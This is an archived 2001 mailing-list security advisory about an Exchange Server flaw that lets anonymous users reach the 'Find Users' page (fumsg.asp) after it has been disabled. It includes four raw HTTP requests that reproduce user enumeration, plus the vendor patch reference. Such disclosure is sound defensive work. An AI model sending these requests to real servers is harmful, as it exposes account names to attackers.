Exchange Public Folders Information Leakage

From: Aviram Jenik (aviramat_private)
Date: Fri Sep 07 2001 - 02:21:07 PDT

Next message: Tarhon-Onu Victor: "Re: pam limits drops privileges"

Previous message: Digital Shadow: "rlmadmin v3.8M view file symlink vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The following security advisory is sent to the securiteam mailing list,
and
can be found at the SecuriTeam web site: http://www.securiteam.com

SUMMARY

Microsoft Exchange Server handles anonymous access to its Public Folders

insecurely. While administrators may disable the "Find Users" features
to 
prevent anonymous users from enumerating existing user names, a security

flaw in Exchange server allows remote attackers with access to the 
exchange server to run "Find Users".

DETAILS

Microsoft Exchange's Public Folders options of "Find Users" can be 
disabled. This, however, does not prevent the users from directly 
accessing the ASP page (fumsg.asp). The link to the "Find Users" will be

hidden, however it is still possible to programmatically access the
page.

Steps to recreate: 
1) Contact:
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com


2) Access the redirected page, and resend the issued cookie.
GET /exchange/logonfrm.asp HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN


3) Access the redirected page, and resend the issued cookie.
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN


4) Issue this request to obtain a list of users with the letter 'a' in 
their name (e.g. Administrator)
POST /exchange/finduser/fumsg.asp HTTP/1.1
Host: www.example.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=

Vendor status:
Microsoft has been contacted on August 4, 2001. A security bulletin was 
released on September 7, 2001.

Solution:
Microsoft has released a patch for this problem. See  
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
more information.


ADDITIONAL INFORMATION
This security hole was discovered by  <mailto:noamrat_private> Noam
Rathaus.
The information has been provided by  <mailto:expertsat_private>
SecuriTeam Experts.



====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any
kind.
In no event shall we be liable for any damages whatsoever including
direct,
indirect, incidental, consequential, loss of business profits or special
damages.

Next message: Tarhon-Onu Victor: "Re: pam limits drops privileges"
Previous message: Digital Shadow: "rlmadmin v3.8M view file symlink vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:53:07 PDT